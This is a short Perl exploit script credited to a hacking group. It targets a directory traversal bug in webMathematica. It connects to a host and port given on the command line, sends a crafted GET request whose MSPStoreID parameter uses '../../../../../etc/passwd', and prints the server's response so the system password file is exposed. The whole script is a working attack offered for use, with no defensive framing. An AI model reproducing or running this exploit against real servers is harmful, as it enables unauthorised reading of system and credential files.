#!/usr/bin/perl
# Author: ntfx <root@legion2000.security.nu>
# legion2000SR http://legion2000.security.nu
# Directory Transversal bug in webMathematica
# Shows passwd file or other system files in unix
# shows full path disclosure on NT, possible system file exposure.
# greet: il, opt1k, kat, spy
###

use IO::Socket;
use strict;

if(! $ARGV[0])
	{
 	&usage;
 	exit;
 }

sub usage() {
	print "USAGE: perl $0 <host> <port>\n";
	print "Author: ntfx ntfx\@kernel.net\n";
	print "webMathematica Directory Transversal bug\n";
	print "Legion2000SR http://legion2000.security.nu\n";
	exit(0); 
}

my $host   = $ARGV[0];
my $port   = $ARGV[1];
my $lin;
my @passwd;

my $tcpval = getprotobyname('tcp');
my $victim = inet_aton($host);
my $serverAddr = sockaddr_in($port, $victim);
my $protocol_name = "tcp";

my $sexual  = inet_aton($host); 
my $emotia  = sockaddr_in($port, $sexual);    
my $proto  = getprotobyname('tcp');
        
socket(SOCK, PF_INET, SOCK_STREAM, $proto); 
	connect(SOCK, $emotia);
print "\n now getting the passwd file\n\n";

my $submit = "GET /webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=text\n\n";   
	send(SOCK,$submit,0);

@passwd=<SOCK>;

close (SOCK);

foreach $lin(@passwd) 
			{
			print "$lin";
			}

print "\npasswd file should now be shown\n\n";